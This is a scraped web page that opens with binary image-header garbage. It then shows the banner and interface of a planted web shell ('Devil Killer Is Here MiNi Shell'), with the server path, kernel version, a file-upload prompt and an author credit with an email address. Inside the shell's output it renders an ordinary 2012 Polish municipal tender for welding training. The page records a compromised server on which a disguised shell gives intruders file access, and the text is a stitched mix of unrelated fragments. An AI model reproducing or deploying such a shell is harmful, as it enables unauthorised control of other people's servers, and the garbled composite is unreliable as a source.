JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/317314-N-2012.html

<p class="kh_header"><b>Pietrowice Wielkie: Spawanie blach i rur spoinami pachwinowymi metodą MAG 135 i TIG 141</b><br>
<b>Numer ogłoszenia: 317314 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Szkolna 5, 47-480 Pietrowice Wielkie, woj. śląskie, tel. 32 4198101, faks 32 4198101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.pietrowicewielkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Spawanie blach i rur spoinami pachwinowymi metodą MAG 135 i TIG 141.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Zorganizowanie i przeprowadzenie szkolenia z zakresu spawania blach i rur spoinami pachwinowymi metodą MAG i metodą TIG oraz egzamin, dla 5 uczestników w  łącznej ilości 248 godzin podzielonych na dwa  etapy 2) Etap I szkolenia spawanie  blach i rur spoinami metodą MAG 135 musi odbyć się w dniach od 15.10.2012r. do 16.11.2012r. w łącznej ilości 145 godzin (dydaktycznych, praktycznych) 3) Etap II szkolenia spawanie blach i rur spoinami pachwinowymi metodą TIG 141 musi odbyć się w dniach od 4.02.2013r. do 22.02.2013r. w łącznej ilości 103 godziny (dydaktycznych, praktycznych oraz egzamin) 4) Egzamin powinien zostać przeprowadzony po zakończeniu II etapu szkolenia 5) Za godzinę dydaktyczną uznaje się godzinę lekcyjną trwającą  45 min, za godzinę praktyczną uznaje się godzinę zegarową 6) Szkolenie powinno obywać się przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu od poniedziałku do piątku w godz. pomiędzy 8.00- 15.30. 7) Uczestnikom szkolenia przysługują w czasie szkolenia: 15 min. przerwa kawowa po 2 godzinie dydaktycznej (od godz. 9.30 do 9.45), oraz 30 min. przerwa obiadowa po  6 godzinie dydaktycznej (od godz. 12.45 do 13.15), nie wliczane do czasu trwania szkolenia 8) Szkolenie powinno zakończyć się egzaminem państwowym wg. wytycznych W-07-IS-17  Instytutu Spawalnictwa w Gliwicach i wydaniem oraz osobom, które uzyskały pozytywne wyniki egzaminu książeczek spawacza z CERTYFIKATEM ważnym w krajach UE. 2. Szkolenie powinno zakończyć się wydaniem uczestnikom, którzy ukończyli szkolenia zaświadczenia zgodnie z przepisami Ministra Edukacji i Nauki (Rozporządzenie z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31 poz.216) 3.Wykonawca musi zapewnić: 1) lokal wyposażony w stoliki, krzesła (w ilości odpowiadającej ilości uczestników szkolenia), sanitariaty oraz wyposażony w profesjonalny sprzęt i stanowiska umożliwiające prawidłową realizację szkolenia, 2) lokal o którym mowa wyżej musi znajdować się na terenie miasta Raciborza  3) kadrę dydaktyczną posiadającą kwalifikacje zawodowe odpowiednie do prowadzonych szkoleń, 4) materiały dydaktyczne i ćwiczeniowe niezbędne przy realizacji szkolenia, 5)odpowiednie warunki BHP podczas szkolenia 6) pomieszczenie socjalne do spożywania posiłków 7) catering:  a)w przerwie kawowej: kawę, herbatę, wodę miner. niegaz. w dzbankach (0,33l-os)., mleczko-śmietankę do kawy, cukier, oraz na przemiennie: owoc, jogurt, batonik  (1 szt-os), ciasta kruche koktajlowe (4szt-os) b) w przerwie obiadowej gorący posiłek (drugie danie w skład którego wchodzą ziemniaki lub ryż lub kasza; porcja mięsa lub ryby; surówka) każdego dnia inny zestaw podawany w opakowaniach termoizolacyjnych jednorazowego użytku wraz ze sztućcami jednorazowego użytku oraz woda miner. niegaz. w dzbankach (0,33l-os) 4. Wykonawca jest zobowiązany- przeprowadzić zajęcia zgodnie ze złożoną ofertą, wymaganiami i warunkami określonymi w przedmiocie zamówienia 1) oznakować wszelką dokumentację związaną z realizacją umowy zgodnie z wytycznymi Zamawiającego oraz z Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki znajdującymi się na stronie www.efs.gov.pl, 2) opracować i dołączyć przed podpisaniem umowy program zgodny z wytycznymi W-07-IS-03  Instytutu Spawalnictwa w Gliwicach z określeniem czasu jego trwania  sporządzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 02 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. z 2007r. Nr 47, poz. 315) zawierający w szczególności: a)nazwę i zakres szkolenia, b)czas trwania i sposób organizacji szkolenia (z odznaczeniem informacji dotyczących c)ogólnej liczby godzin zajęć teoretycznych, praktycznych oraz zarezerwowanych na d)egzamin końcowy), e)wymagania wstępne dla uczestników szkolenia, f)cele szkolenia, g)plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar z h)uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, i)treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, j)wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, k)sposób sprawdzania efektów szkolenia, 3)przed rozpoczęciem szkolenia zapewnić uczestnikom badania lekarskie i zaświadczenia potwierdzające zdolność do uczestnictwa w szkoleniu i wykonywania zawodu spawacza, 4)opracować harmonogram przeprowadzenia szkolenia w oparciu o ustaloną częstotliwość spotkań z określeniem czasu jego trwania z uwzględnieniem wszystkich godzin zgodny z programem i przedłożyć Zamawiającemu przed podpisaniem umowy, 5)dostarczyć w dniu rozpoczęcia zajęć uczestnikom niezbędne materiały biurowe (notes oraz długopis- w ilości po 1 szt na uczestnika) oraz materiały ćwiczeniowe niezbędne do realizacji szkolenia, 6)zapewnić uczestnikom na własność środki ochrony osobistej: ubrania robocze (rękawice, okulary, spodnie, bluza, buty), 7)przeprowadzić egzamin państwowy na zakończenie szkolenia, 8)ubezpieczyć uczestników na cały czas trwania szkolenia (od dnia rozpoczęcia szkolenia) od następstw nieszczęśliwych wypadków (na sumę ubezpieczenia 10 000 zł, forma ubezpieczenia imienna, pełny zakres całodobowy). Kserokopię polisy należy dostarczyć do Zamawiającego  najpóźniej na dwa dni przed planowanym rozpoczęciem szkolenia, a w przypadku kiedy okres od podpisania umowy do rozpoczęcia szkolenia będzie krótszy, to najpóźniej w dniu rozpoczęcia. W przypadku zmiany osób uczestniczących w Projekcie Wykonawca zobowiązany jest zapewnić ubezpieczenie nowym uczestnikom na własny koszt.  9)przed rozpoczęciem szkolenia zamieścić ogłoszenie o szkoleniu i nazwę instytucji szkolącej na stronie internetowej pod adresem: www.inwestycjawkadry.pl, a wydruk ze strony internetowej dostarczyć Zamawiającemu najpóźniej w pierwszym dniu szkolenia,  10)niezwłocznie informować na piśmie Zamawiającego o nieobecności uczestnika na zajęciach lub rezygnacji z uczestnictwa w nich, 11)wydać zaświadczenie i certyfikat o ukończeniu szkolenia (Zamawiającemu) potwierdzającego zakres oraz umiejętności zdobyte w związku z ich ukończeniem. Wydane zaświadczenie powinno obowiązkowo zawierać dodatkowe informacje o współfinansowaniu w ramach PO KL oraz logo UE, EFS. 12)przeprowadzić na zakończenie zajęć badania ankietowe uczestniczek dotyczące poziomu zawartości merytorycznej oraz jakości prowadzonego szkolenia. Ankieta ta winna posiadać metryczkę (wzór ankiety należy dołączyć celem zatwierdzenia przed podpisaniem umowy), 13)przeprowadzić analizę ankiet a wyniki przekazać Zamawiającemu w formie papierowej oraz elektronicznej z możliwością przetwarzania danych, 14)prowadzić dokumentację z przebiegu szkolenia, (dokumentacja powinna obowiązkowo zawierać informację o współfinansowaniu w ramach PO KL oraz logo- EFS, UE ) którą stanowi: a)lista obecności- obecność na liście musi być potwierdzona własnoręcznym podpisem uczestnika-uzupełniania na bieżąco, b)lista potwierdzającą odbiór materiałów biurowych przez uczestników, c) dziennik  zawierający wymiar godzin, tematy szkolenia- uzupełniany na bieżąco, d) rejestr wydanych zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia- sporządzony po zakończonym szkoleniu, e)ankiety z przeprowadzonych badań- sporządzone podczas ostatnich zajęć z uczestniczkami szkolenia, f )analizę z przeprowadzonych badań sporządzoną po zakończeniu szkolenia, g)lista osób - odbiór Cateringu (potwierdzona własnoręcznym podpisem uczestnika) - uzupełniania na bieżąco, i)zdjęcia dokumentujące przebieg szkolenia min. 10 zdjęć ze szkoleń teoretycznych i praktycznych dokumentujących szkolenie, które należy dostarczyć na płycie CD-DVD w momencie ukończenia szkolenia (Wykonawca zobowiązany jest do wykonania zdjęć aparatem cyfrowym) 15)do przechowywania dokumentacji związanej z realizacją szkolenia do dnia 31.12.2020r. W przypadku konieczności przedłużenia tego terminu Zamawiający o tym Wykonawcę przed jego upływem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży Oświadczenie, że posiada wpis do rejestru instytucji szkoleniowych (zgodnie z art.20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69, poz. 415 z poź. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca złoży wykaz wykonanych usług szkoleniowych (Załącznik nr 5 do SIWZ- Oferty) z którego jednoznacznie będzie wynikać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wykonywał co najmniej 3 usługi polegające na prowadzeniu teoretycznych i praktycznych szkoleń z zakresu spawania blach i rur spoinami pachwinowymi metodą MAG 135  i metodą TIG 141, potwierdzonych dokumentami, że usługi zostały wykonane należycie oraz warunek zostanie spełniony jeżeli Wykonawca wykaże, że posiada Atest Instytutu Spawalnictwa uprawniający do szkolenia i egzaminowania spawaczy lub dokument równoważny, potwierdzający że szkolenie spawaczy prowadzone jest zgodnie z wymogami ministra właściwego do spraw gospodarki</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie, (Załącznik nr 6 do SIWZ-Oferty) że dysponuje lokalem wyposażonym w stoliki, krzesła (w ilości odpowiadającej ilości uczestników szkolenia), sanitariaty oraz wyposażonym w profesjonalny sprzęt i stanowiska umożliwiające prawidłową realizację szkolenia, usytuowanym na terenie miasta Raciborza</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca złoży Wykaz osób, które będą uczestniczyć w wykonywaniu zamowienia i wykaże że dysponuje co najmniej 2 osobami, które posiadają kwalifikacje i uprawnienia związane z przedmiotem zamówienia i posiadają doświadczenie w prowadzeniu min. jednego szkolenia z zakresu spawania blach i rur spoinami pachwinowymi metodą MAG 135  i metodą TIG 141 w zakresie teoretycznym i praktycznym. Zamawiający dokonując oceny oferty pod kątem osoby zdolne do wykonania zamowienia przeanalizuje Wykaz osób (Załącznik nr 7 do SIWZ-Oferty), z ktorego jednozancznie musi wynikać, że Wykonawca spełnia ww. warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu warunku i sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz ofertowy ( Załącznik Nr1 do SIWZ), 2) Oświadczenie, o posiadaniu wpisu do rejestru instytucji szkoleniowych, oraz -jeżeli dotyczą: 3) Dokument/y stwierdzające ustanowienie pełnomocnika zgodnie z art.23 ust.2 u. o p.z.p., w przypadku gdy o udzielenie niniejszego zamówienia Wykonawcy ubiegają się wspólnie - oryginał lub kopia poświadczenia za zgodność z oryginałem przez notariusza, 4) pełnomocnictwo do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy wskazano inną osobę niż upoważniona z mocy prawa- oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza lub innego dokumentu, z którego wynika upoważnienie do reprezentowania Wykonawcy, 5) pisemne zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (treść dokumentu musi zawierać między innymi następujące informacje kto udziela, komu udziela, jakie zasoby udziela, tytuł prawny pod jakim potencjał zostanie udostępniony, wskazanie okresu na jaki zostaną udostępnione zasoby)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 u. o p.z.p. Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach: a. w przypadku zaistnienia zdarzeń losowych niemożliwych do przewidzenia, powodujących konieczność zmiany prowadzącego szkolenie, b. rezygnacji lub utraty uprawnień do korzystania z projektu przez uczestnika Zamawiający w jego miejsce może wprowadzić nową osobę. c. zmiany lokalu w którym prowadzone jest szkolenie. Nowy lokal musi spełniać warunki określone w SIWZ. 2.Zamawiający może odstąpić od umowy w przypadku braku środków finansowych na jej realizację oraz w przypadku wstrzymania realizacji projektu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.pietrowicewielkie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, 47-480 Pietrowice Wielkie, ul. Szkolna 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej, 47-480 Pietrowice Wielkie, ul. Szkolna 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Projektu DO PRACY BY SIĘ SZŁO- NASZA GMINA NAS PROMUJE w ramach Priorytetu VII, Działania 7.1 Poddziałania 7.11 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com